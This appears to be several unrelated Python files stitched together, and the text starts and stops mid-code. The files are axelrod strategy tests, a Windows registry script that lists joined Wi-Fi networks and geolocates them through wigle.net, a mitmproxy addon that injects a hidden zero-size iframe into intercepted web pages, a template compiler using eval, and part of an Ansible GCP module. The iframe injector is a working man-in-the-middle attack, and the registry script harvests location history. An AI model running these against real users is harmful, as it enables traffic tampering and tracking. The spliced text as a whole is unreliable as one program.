        """Check that grudged gets reset properly"""
        P1 = self.player()
        P1.history = [C, D]
        P2 = axelrod.Player()
        P2.history = [D, D]
        self.assertEqual(P1.strategy(P2), D)
        self.assertTrue(P1.grudged)
        P1.reset()
        # After reset both the grudge flag and the history must be cleared.
        self.assertFalse(P1.grudged)
        self.assertEqual(P1.history, [])
class TestFoolMeOnce(TestPlayer):
    """Tests for the FoolMeOnce strategy."""

    name = "Fool Me Once"
    player = axelrod.FoolMeOnce
    expected_classifier = {
        'memory_depth': float('inf'),  # Long memory
        'stochastic': False,
        'inspects_source': False,
        'manipulates_source': False,
        'manipulates_state': False
    }

    def test_initial(self):
        # First move is always cooperation.
        self.first_play_test(C)

    def test_strategy(self):
        """
        If opponent defects more than once, defect forever
        """
        # One defection is forgiven...
        self.responses_test([C], [D], [C])
        # ...a second defection triggers permanent defection.
        self.responses_test([C, C], [D, D], [D])
        self.responses_test([C, C], [D, C], [C])
        self.responses_test([C, C, C], [D, D, D], [D])
class TestForgetfulFoolMeOnce(TestPlayer):
    """Tests for the stochastic ForgetfulFoolMeOnce strategy."""

    name = 'Forgetful Fool Me Once'
    player = axelrod.ForgetfulFoolMeOnce
    expected_classifier = {
        'memory_depth': float('inf'),  # Long memory
        'stochastic': True,
        'inspects_source': False,
        'manipulates_source': False,
        'manipulates_state': False
    }

    def test_initial(self):
        # First move is always cooperation.
        self.first_play_test(C)

    def test_strategy(self):
        """Test that will forgive one D but will grudge after 2 Ds, randomly
        forgets count"""
        # Seeded so the stochastic forgetting is reproducible.
        random.seed(2)
        self.responses_test([C], [D], [C])
        self.responses_test([C, C], [D, D], [D])
        # Sometime eventually forget count:
        self.responses_test([C, C], [D, D], [D] * 13 + [C])

    def test_reset(self):
        """Check that count gets reset properly"""
        P1 = self.player()
        P1.history = [C, D]
        P2 = axelrod.Player()
        P2.history = [D]
        random.seed(1)
        self.assertEqual(P1.strategy(P2), C)
        self.assertEqual(P1.D_count, 1)
        P1.reset()
        # After reset both the defection count and history must be cleared.
        self.assertEqual(P1.D_count, 0)
        self.assertEqual(P1.history, [])
class TestFoolMeForever(TestPlayer):
    """Tests for the FoolMeForever strategy."""

    name = "Fool Me Forever"
    player = axelrod.FoolMeForever
    expected_classifier = {
        'memory_depth': float('inf'),  # Long memory
        'stochastic': False,
        'inspects_source': False,
        'manipulates_source': False,
        'manipulates_state': False
    }

    def test_strategy(self):
        """
        If opponent defects more than once, defect forever
        """
        # Expected pattern per the assertions: opens with D, then
        # cooperates while the opponent's history is D followed by Cs.
        self.responses_test([], [], [D])
        self.responses_test([D], [D], [C])
        self.responses_test([D], [C], [D])
        self.responses_test([D, C], [D, C], [C])
        self.responses_test([D, C, C], [D, C, C], [C])
|
""" Windows Registry Network Query
Lists the network name and MAC addresses of the networks that
this computer has connected to. If the location command is given
print the coordinates of the network if they are in the wigle
database
Don't be a moron, please don't use this for something illegal.
Usage:
windows_registry.py
windows_registry.py location <username> <password>
windows_registry.py -h | --help
windows_registry.py --version
Options:
-h, --help Display this message
--version Display the version of this program
"""
import mechanize
import urllib
import re
from _winreg import OpenKey, EnumKey, EnumValue, HKEY_LOCAL_MACHINE, CloseKey
from docopt import docopt
def binary2mac(binary):
    """Render a registry binary value as a colon-separated MAC address."""
    # Two lowercase hex digits per byte, colon-joined, clipped to the
    # standard 17-character MAC length.
    octets = ["%02x" % ord(ch) for ch in binary]
    return ":".join(octets)[:17]
def wigle_print(username, password, netid):
    """Log in to wigle.net and print the recorded lat/lon for *netid*.

    :param username: wigle.net account name
    :param password: wigle.net account password
    :param netid: MAC address (BSSID) to look up
    """
    browser = mechanize.Browser()
    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})
    browser.open('https://wigle.net//gps/gps/main/login', reqData)
    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()
    mapLat = 'N/A'
    mapLon = 'N/A'
    rLat = re.findall(r'maplat=.*\&', resp)
    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]
    rLon = re.findall(r'maplon=.*\&', resp)
    if rLon:
        # Bug fix: previously the bound method itself (`rLon[0].split`) was
        # assigned, so the longitude printed as a method repr. Extract the
        # value the same way as the latitude.
        mapLon = rLon[0].split('&')[0].split('=')[1]
    print('[-] Lat: ' + mapLat + ', Lon: ' + mapLon)
def print_networks(username=None, password=None):
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
key = OpenKey(HKEY_LOCAL_MACHINE, net)
print '\n[*] Networks You have Joined.'
for i in range(100):
try:
guid = EnumKey(key, i)
netKey = OpenKey(key, str(guid))
(n, addr, t) = EnumValue(netKey, 5)
(n, name, t) = EnumValue(netKey, 4)
mac = binary2mac(addr)
net_name = str(name)
print '[+] ' + net_name + ' ' + mac
wigle_print(username, password, mac)
CloseKey(netKey)
except:
break
def main():
    """Parse the command line and run the registry query, optionally with
    wigle location lookups."""
    args = docopt(__doc__, version=0.1)
    if args['location']:
        print_networks(username=args['username'], password=args['password'])
    else:
        print_networks()

if __name__ == '__main__':
    main()
|
import sys
from bs4 import BeautifulSoup
class Injector:
    """mitmproxy addon that prepends an invisible iframe to HTML responses."""

    def __init__(self, iframe_url):
        # URL to inject; also used to skip responses from the iframe's
        # own host (substring match against the URL).
        self.iframe_url = iframe_url

    def response(self, flow):
        """Insert the iframe at the top of <body>, if the page has one."""
        if flow.request.host in self.iframe_url:
            return
        soup = BeautifulSoup(flow.response.content, "html.parser")
        if not soup.body:
            return
        hidden_frame = soup.new_tag(
            "iframe",
            src=self.iframe_url,
            frameborder=0,
            height=0,
            width=0)
        soup.body.insert(0, hidden_frame)
        flow.response.content = str(soup).encode("utf8")
def start():
    """Build the addon; expects exactly one script argument (the iframe URL)."""
    argc = len(sys.argv)
    if argc != 2:
        raise ValueError('Usage: -s "iframe_injector.py url"')
    iframe_url = sys.argv[1]
    return Injector(iframe_url)
|
import re
class Templates:
    """Compile small tree-template strings into one-argument lambdas.

    A template is a token sequence: '(' LABEL args... ')' builds a labelled
    PTB node, '[' args... ']' an unlabelled one, and the single-character
    tokens in SIMPLE expand directly to expressions over the node `_n`.
    """

    # Tokenizer: runs of letters, or any single non-space character.
    TOKENS = re.compile('([A-Za-z]+|[^ ])')

    # Single-token templates that map directly to an expression on _n.
    SIMPLE = {
        'l': '_n.l.ptb()',
        'r': '_n.r.ptb()',
        '<': 'addr(_n)',
        '>': 'addl(_n)',
    }

    def compile(self, template):
        """Parse *template* and return `lambda _n: <generated expression>`."""
        python = self.parse(self.TOKENS.findall(template))
        return eval("lambda _n: %s" % python)

    def parse(self, tokens):
        """Consume tokens and return Python source for one template node.

        :raises SyntaxError: on an unknown token.
        """
        t = tokens.pop(0)
        if t in '([':
            if t == '(':
                label = "'%s'" % tokens.pop(0)
                args = self.parse_args(tokens, ')')
            else:  # t == '['  (bug fix: previously tested the undefined name 's')
                label = 'None'
                args = self.parse_args(tokens, ']')
            return 'PTB(_n, %s, %s)' % (label, ', '.join(args))
        elif t in self.SIMPLE:
            return self.SIMPLE[t]
        else:
            # Call-form raise works on both Python 2 and 3 (the old
            # `raise E, msg` statement form was Python-2 only).
            raise SyntaxError("unknown token '%s'" % t)

    def parse_args(self, tokens, delimiter):
        """Parse argument expressions until *delimiter* is consumed.

        :raises SyntaxError: if the tokens run out before the delimiter.
        """
        args = []
        while tokens:
            if tokens[0] == delimiter:
                tokens.pop(0)
                return args
            args.append(self.parse(tokens))
        raise SyntaxError("missing closing '%s'" % delimiter)
# Module-level compiler instance; 't' holds the compiled "<" template.
templates = Templates()
t = templates.compile("<")
|
from __future__ import absolute_import, division, print_function
# Make classes defined in this module new-style under Python 2.
__metaclass__ = type

# Metadata consumed by Ansible's documentation/lifecycle tooling.
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_backend_service
description:
- A Backend Service defines a group of virtual machines that will serve traffic for
load balancing. This resource is a global backend service, appropriate for external
load balancing or self-managed internal load balancing.
- For managed internal load balancing, use a regional backend service instead.
- Currently self-managed internal load balancing is only available in beta.
short_description: Creates a GCP BackendService
version_added: '2.6'
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
type: str
affinity_cookie_ttl_sec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set
to 0, the cookie is non-persistent and lasts only until the end of the browser
session (or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
type: int
backends:
description:
- The set of backends that serve this BackendService.
required: false
type: list
suboptions:
balancing_mode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION.
Valid values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
- 'Some valid choices include: "UTILIZATION", "RATE", "CONNECTION"'
required: false
default: UTILIZATION
type: str
capacity_scaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on
UTILIZATION, RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is
completely drained, offering 0% of its available Capacity. Valid range is
[0.0,1.0].
required: false
default: '1.0'
type: str
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
required: false
type: str
group:
description:
- The fully-qualified URL of an Instance Group or Network Endpoint Group resource.
In case of instance group this defines the list of instances that serve
traffic. Member virtual machine instances from each instance group must
live in the same zone as the instance group itself. No two backends in a
backend service are allowed to use same Instance Group resource.
- For Network Endpoint Groups this defines list of endpoints. All endpoints
of Network Endpoint Group must be hosted on instances located in the same
zone as the Network Endpoint Group.
- Backend service can not contain mix of Instance Group and Network Endpoint
Group backends.
- Note that you must specify an Instance Group or Network Endpoint Group resource
using the fully-qualified URL, rather than a partial URL.
required: false
type: str
max_connections:
description:
- The max number of simultaneous connections for the group. Can be used with
either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or one of maxConnectionsPerInstance
or maxConnectionsPerEndpoint, as appropriate for group type, must be set.
required: false
type: int
max_connections_per_instance:
description:
- The max number of simultaneous connections that a single backend instance
can handle. This is used to calculate the capacity of the group. Can be
used in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance
must be set.
required: false
type: int
max_connections_per_endpoint:
description:
- The max number of simultaneous connections that a single backend network
endpoint can handle. This is used to calculate the capacity of the group.
Can be used in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerEndpoint
must be set.
required: false
type: int
version_added: '2.9'
max_rate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required
if RATE mode. For RATE mode, either maxRate or one of maxRatePerInstance
or maxRatePerEndpoint, as appropriate for group type, must be set.
required: false
type: int
max_rate_per_instance:
description:
- The max requests per second (RPS) that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either
balancing mode. For RATE mode, either maxRate or maxRatePerInstance must
be set.
required: false
type: str
max_rate_per_endpoint:
description:
- The max requests per second (RPS) that a single backend network endpoint
can handle. This is used to calculate the capacity of the group. Can be
used in either balancing mode. For RATE mode, either maxRate or maxRatePerEndpoint
must be set.
required: false
type: str
version_added: '2.9'
max_utilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization
target for the group. The default is 0.8. Valid range is [0.0, 1.0].
required: false
default: '0.8'
type: str
cdn_policy:
description:
- Cloud CDN configuration for this BackendService.
required: false
type: dict
suboptions:
cache_key_policy:
description:
- The CacheKeyPolicy for this CdnPolicy.
required: false
type: dict
suboptions:
include_host:
description:
- If true requests to different hosts will be cached separately.
required: false
type: bool
include_protocol:
description:
- If true, http and https requests will be cached separately.
required: false
type: bool
include_query_string:
description:
- If true, include query string parameters in the cache key according
to query_string_whitelist and query_string_blacklist. If neither is
set, the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
required: false
type: bool
query_string_blacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
type: list
query_string_whitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
type: list
signed_url_cache_max_age_sec:
description:
- Maximum number of seconds the response to a signed URL request will be considered
fresh, defaults to 1hr (3600s). After this time period, the response will
be revalidated before being served.
- 'When serving responses to signed URL requests, Cloud CDN will internally
behave as though all responses from this backend had a "Cache-Control: public,
max-age=[TTL]" header, regardless of any existing Cache-Control header.
The actual headers served in responses will not be altered.'
required: false
default: '3600'
type: int
version_added: '2.8'
connection_draining:
description:
- Settings for connection draining .
required: false
type: dict
suboptions:
draining_timeout_sec:
description:
- Time for which instance will be drained (not accept new connections, but
still work to finish started).
required: false
default: '300'
type: int
description:
description:
- An optional description of this resource.
required: false
type: str
enable_cdn:
description:
- If true, enable Cloud CDN for this BackendService.
required: false
type: bool
health_checks:
description:
- The set of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified
instead.
required: true
type: list
iap:
description:
- Settings for enabling Cloud Identity Aware Proxy.
required: false
type: dict
version_added: '2.7'
suboptions:
enabled:
description:
- Enables IAP.
required: false
type: bool
oauth2_client_id:
description:
- OAuth2 Client ID for IAP .
required: true
type: str
oauth2_client_secret:
description:
- OAuth2 Client Secret for IAP .
required: true
type: str
load_balancing_scheme:
description:
- Indicates whether the backend service will be used with internal or external
load balancing. A backend service created for one type of load balancing cannot
be used with the other. Must be `EXTERNAL` or `INTERNAL_SELF_MANAGED` for a
global backend service. Defaults to `EXTERNAL`.
- 'Some valid choices include: "EXTERNAL", "INTERNAL_SELF_MANAGED"'
required: false
default: EXTERNAL
type: str
version_added: '2.7'
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
type: str
port_name:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
required: false
type: str
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- 'Possible values are HTTP, HTTPS, HTTP2, TCP, and SSL. The default is HTTP.
**NOTE**: HTTP2 is only valid for beta HTTP/2 load balancer types and may result
in errors if used with the GA API.'
- 'Some valid choices include: "HTTP", "HTTPS", "HTTP2", "TCP", "SSL"'
required: false
type: str
security_policy:
description:
- The security policy associated with this backend service.
required: false
type: str
version_added: '2.8'
session_affinity:
description:
- Type of session affinity to use. The default is NONE. Session affinity is not
applicable if the protocol is UDP.
- 'Some valid choices include: "NONE", "CLIENT_IP", "CLIENT_IP_PORT_PROTO", "CLIENT_IP_PROTO",
"GENERATED_COOKIE", "HEADER_FIELD", "HTTP_COOKIE"'
required: false
type: str
timeout_sec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
required: false
type: int
aliases:
- timeout_seconds
project:
description:
- The Google Cloud Platform project to use.
type: str
auth_kind:
description:
- The type of credential used.
type: str
required: true
choices:
- application
- machineaccount
- serviceaccount
service_account_contents:
description:
- The contents of a Service Account JSON file, either in a dictionary or as a
JSON string that represents it.
type: jsonarg
service_account_file:
description:
- The path of a Service Account JSON file if serviceaccount is selected as type.
type: path
service_account_email:
description:
- An optional service account email address if machineaccount is selected and
the user does not wish to use the default email.
type: str
scopes:
description:
- Array of scopes to be used
type: list
env_type:
description:
- Specifies which Ansible environment you're running this module within.
- This should not be set unless you know what you're doing.
- This only alters the User Agent string for any API requests.
type: str
notes:
- 'API Reference: U(https://cloud.google.com/compute/docs/reference/v1/backendServices)'
- 'Official Documentation: U(https://cloud.google.com/compute/docs/load-balancing/http/backend-service)'
- For authentication, you can set service_account_file using the C(GCP_SERVICE_ACCOUNT_FILE)
  env variable.
- For authentication, you can set service_account_contents using the C(GCP_SERVICE_ACCOUNT_CONTENTS)
  env variable.
- For authentication, you can set service_account_email using the C(GCP_SERVICE_ACCOUNT_EMAIL)
env variable.
- For authentication, you can set auth_kind using the C(GCP_AUTH_KIND) env variable.
- For authentication, you can set scopes using the C(GCP_SCOPES) env variable.
- Environment variables values will only be used if the playbook values are not set.
- The I(service_account_email) and I(service_account_file) options are mutually exclusive.
'''
EXAMPLES = '''
- name: create a instance group
gcp_compute_instance_group:
name: instancegroup-backendservice
zone: us-central1-a
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: instancegroup
- name: create a HTTP health check
gcp_compute_http_health_check:
name: httphealthcheck-backendservice
healthy_threshold: 10
port: 8080
timeout_sec: 2
unhealthy_threshold: 5
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: healthcheck
- name: create a backend service
gcp_compute_backend_service:
name: test_object
backends:
- group: "{{ instancegroup.selfLink }}"
health_checks:
- "{{ healthcheck.selfLink }}"
enable_cdn: 'true'
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
affinityCookieTtlSec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set
to 0, the cookie is non-persistent and lasts only until the end of the browser
session (or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: int
backends:
description:
- The set of backends that serve this BackendService.
returned: success
type: complex
contains:
balancingMode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION.
Valid values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
returned: success
type: str
capacityScaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on UTILIZATION,
RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is completely
drained, offering 0% of its available Capacity. Valid range is [0.0,1.0].
returned: success
type: str
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
returned: success
type: str
group:
description:
- The fully-qualified URL of an Instance Group or Network Endpoint Group resource.
In case of instance group this defines the list of instances that serve traffic.
Member virtual machine instances from each instance group must live in the
same zone as the instance group itself. No two backends in a backend service
are allowed to use same Instance Group resource.
- For Network Endpoint Groups this defines list of endpoints. All endpoints
of Network Endpoint Group must be hosted on instances located in the same
zone as the Network Endpoint Group.
- Backend service can not contain mix of Instance Group and Network Endpoint
Group backends.
- Note that you must specify an Instance Group or Network Endpoint Group resource
using the fully-qualified URL, rather than a partial URL.
returned: success
type: str
maxConnections:
description:
- The max number of simultaneous connections for the group. Can be used with
either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or one of maxConnectionsPerInstance
or maxConnectionsPerEndpoint, as appropriate for group type, must be set.
returned: success
type: int
maxConnectionsPerInstance:
description:
- The max number of simultaneous connections that a single backend instance
can handle. This is used to calculate the capacity of the group. Can be used
in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must
be set.
returned: success
type: int
maxConnectionsPerEndpoint:
description:
- The max number of simultaneous connections that a single backend network endpoint
can handle. This is used to calculate the capacity of the group. Can be used
in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerEndpoint must
be set.
returned: success
type: int
maxRate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required
if RATE mode. For RATE mode, either maxRate or one of maxRatePerInstance or
maxRatePerEndpoint, as appropriate for group type, must be set.
returned: success
type: int
maxRatePerInstance:
description:
- The max requests per second (RPS) that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either
balancing mode. For RATE mode, either maxRate or maxRatePerInstance must be
set.
returned: success
type: str
maxRatePerEndpoint:
description:
- The max requests per second (RPS) that a single backend network endpoint can
handle. This is used to calculate the capacity of the group. Can be used in
either balancing mode. For RATE mode, either maxRate or maxRatePerEndpoint
must be set.
returned: success
type: str
maxUtilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization
target for the group. The default is 0.8. Valid range is [0.0, 1.0].
returned: success
type: str
cdnPolicy:
description:
- Cloud CDN configuration for this BackendService.
returned: success
type: complex
contains:
cacheKeyPolicy:
description:
- The CacheKeyPolicy for this CdnPolicy.
returned: success
type: complex
contains:
includeHost:
description:
- If true requests to different hosts will be cached separately.
returned: success
type: bool
includeProtocol:
description:
- If true, http and https requests will be cached separately.
returned: success
type: bool
includeQueryString:
description:
- If true, include query string parameters in the cache key according to
query_string_whitelist and query_string_blacklist. If neither is set,
the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
returned: success
type: bool
queryStringBlacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
queryStringWhitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
signedUrlCacheMaxAgeSec:
description:
- Maximum number of seconds the response to a signed URL request will be considered
fresh, defaults to 1hr (3600s). After this time period, the response will
be revalidated before being served.
- 'When serving responses to signed URL requests, Cloud CDN will internally
behave as though all responses from this backend had a "Cache-Control: public,
max-age=[TTL]" header, regardless of any existing Cache-Control header. The
actual headers served in responses will not be altered.'
returned: success
type: int
connectionDraining:
description:
- Settings for connection draining .
returned: success
type: complex
contains:
drainingTimeoutSec:
description:
- Time for which instance will be drained (not accept new connections, but still
work to finish started).
returned: success
type: int
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
fingerprint:
description:
- Fingerprint of this resource. A hash of the contents stored in this object. This
field is used in optimistic locking.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
enableCDN:
description:
- If true, enable Cloud CDN for this BackendService.
returned: success
type: bool
healthChecks:
description:
- The set of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified
instead.
returned: success
type: list
id:
description:
- The unique identifier for the resource.
returned: success
type: int
iap:
description:
- Settings for enabling Cloud Identity Aware Proxy.
returned: success
type: complex
contains:
enabled:
description:
- Enables IAP.
returned: success
type: bool
oauth2ClientId:
description:
- OAuth2 Client ID for IAP .
returned: success
type: str
oauth2ClientSecret:
description:
- OAuth2 Client Secret for IAP .
returned: success
type: str
oauth2ClientSecretSha256:
description:
- OAuth2 Client Secret SHA-256 for IAP .
returned: success
type: str
loadBalancingScheme:
description:
- Indicates whether the backend service will be used with internal or external load
balancing. A backend service created for one type of load balancing cannot be
used with the other. Must be `EXTERNAL` or `INTERNAL_SELF_MANAGED` for a global
backend service. Defaults to `EXTERNAL`.
returned: success
type: str
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
portName:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
returned: success
type: str
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- 'Possible values are HTTP, HTTPS, HTTP2, TCP, and SSL. The default is HTTP. **NOTE**:
HTTP2 is only valid for beta HTTP/2 load balancer types and may result in errors
if used with the GA API.'
returned: success
type: str
securityPolicy:
description:
- The security policy associated with this backend service.
returned: success
type: str
sessionAffinity:
description:
- Type of session affinity to use. The default is NONE. Session affinity is not
applicable if the protocol is UDP.
returned: success
type: str
timeoutSec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
returned: success
type: int
'''
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import time
def main():
    """Entry point: reconcile the GCP BackendService with the module params.

    Implements the standard generated-module state machine: fetch the live
    resource, then create/update/delete as needed and exit with the final
    resource plus a 'changed' flag.
    """
    # Argument spec mirrors the BackendService API surface; nested suboptions
    # map 1:1 onto the camelCase request fields built in resource_to_request().
    module = GcpModule(
        argument_spec=dict(
            state=dict(default='present', choices=['present', 'absent'], type='str'),
            affinity_cookie_ttl_sec=dict(type='int'),
            backends=dict(
                type='list',
                elements='dict',
                options=dict(
                    balancing_mode=dict(default='UTILIZATION', type='str'),
                    capacity_scaler=dict(default=1.0, type='str'),
                    description=dict(type='str'),
                    group=dict(type='str'),
                    max_connections=dict(type='int'),
                    max_connections_per_instance=dict(type='int'),
                    max_connections_per_endpoint=dict(type='int'),
                    max_rate=dict(type='int'),
                    max_rate_per_instance=dict(type='str'),
                    max_rate_per_endpoint=dict(type='str'),
                    max_utilization=dict(default=0.8, type='str'),
                ),
            ),
            cdn_policy=dict(
                type='dict',
                options=dict(
                    cache_key_policy=dict(
                        type='dict',
                        options=dict(
                            include_host=dict(type='bool'),
                            include_protocol=dict(type='bool'),
                            include_query_string=dict(type='bool'),
                            query_string_blacklist=dict(type='list', elements='str'),
                            query_string_whitelist=dict(type='list', elements='str'),
                        ),
                    ),
                    signed_url_cache_max_age_sec=dict(default=3600, type='int'),
                ),
            ),
            connection_draining=dict(type='dict', options=dict(draining_timeout_sec=dict(default=300, type='int'))),
            description=dict(type='str'),
            enable_cdn=dict(type='bool'),
            health_checks=dict(required=True, type='list', elements='str'),
            iap=dict(
                type='dict',
                options=dict(enabled=dict(type='bool'), oauth2_client_id=dict(required=True, type='str'), oauth2_client_secret=dict(required=True, type='str')),
            ),
            load_balancing_scheme=dict(default='EXTERNAL', type='str'),
            name=dict(required=True, type='str'),
            port_name=dict(type='str'),
            protocol=dict(type='str'),
            security_policy=dict(type='str'),
            session_affinity=dict(type='str'),
            timeout_sec=dict(type='int', aliases=['timeout_seconds']),
        )
    )
    # Default OAuth scope when the playbook does not supply one explicitly.
    if not module.params['scopes']:
        module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
    state = module.params['state']
    kind = 'compute#backendService'
    fetch = fetch_resource(module, self_link(module), kind)
    changed = False
    # Compare the live resource (if any) against the desired state and act.
    if fetch:
        if state == 'present':
            if is_different(module, fetch):
                update(module, self_link(module), kind, fetch)
                fetch = fetch_resource(module, self_link(module), kind)
                changed = True
        else:
            delete(module, self_link(module), kind)
            fetch = {}
            changed = True
    else:
        if state == 'present':
            fetch = create(module, collection(module), kind)
            changed = True
        else:
            fetch = {}
    fetch.update({'changed': changed})
    module.exit_json(**fetch)
def create(module, link, kind):
    """POST the desired resource to *link* and wait for the operation.

    ``kind`` is unused here; it is kept so all CRUD helpers share a uniform
    call signature.
    """
    session = GcpSession(module, 'compute')
    response = session.post(link, resource_to_request(module))
    return wait_for_operation(module, response)
def update(module, link, kind, fetch):
    """Bring the existing resource in line with the module parameters.

    Fields that cannot be changed through PUT (currently the security
    policy) are pushed through their dedicated endpoints first.
    """
    desired = resource_to_request(module)
    update_fields(module, desired, response_to_hash(module, fetch))
    session = GcpSession(module, 'compute')
    return wait_for_operation(module, session.put(link, desired))
def update_fields(module, request, response):
    """Dispatch dedicated-endpoint updates for fields PUT cannot change.

    Currently only the security policy has such an endpoint; it is updated
    only when the desired and live values differ.
    """
    if request.get('securityPolicy') != response.get('securityPolicy'):
        security_policy_update(module, request, response)
def security_policy_update(module, request, response):
    """Attach the configured security policy via its dedicated endpoint."""
    url = (
        "https://www.googleapis.com/compute/v1/"
        "projects/{project}/global/backendServices/{name}/setSecurityPolicy"
    ).format(**module.params)
    session = GcpSession(module, 'compute')
    session.post(url, {u'securityPolicy': module.params.get('security_policy')})
def delete(module, link, kind):
    """Delete the resource at *link* and wait for the operation to finish."""
    session = GcpSession(module, 'compute')
    return wait_for_operation(module, session.delete(link))
def resource_to_request(module):
    """Build the API request body (camelCase) from the module params (snake_case).

    Nested sub-objects are serialised through their helper classes.  Falsy
    values are dropped from the result, except an explicit ``False``, which
    is kept so booleans can be cleared on the remote resource.
    """
    params = module.params
    request = {
        u'kind': 'compute#backendService',
        u'affinityCookieTtlSec': params.get('affinity_cookie_ttl_sec'),
        u'backends': BackendServiceBackendsArray(params.get('backends', []), module).to_request(),
        u'cdnPolicy': BackendServiceCdnpolicy(params.get('cdn_policy', {}), module).to_request(),
        u'connectionDraining': BackendServiceConnectiondraining(params.get('connection_draining', {}), module).to_request(),
        u'description': params.get('description'),
        u'enableCDN': params.get('enable_cdn'),
        u'healthChecks': params.get('health_checks'),
        u'iap': BackendServiceIap(params.get('iap', {}), module).to_request(),
        u'loadBalancingScheme': params.get('load_balancing_scheme'),
        u'name': params.get('name'),
        u'portName': params.get('port_name'),
        u'protocol': params.get('protocol'),
        u'securityPolicy': params.get('security_policy'),
        u'sessionAffinity': params.get('session_affinity'),
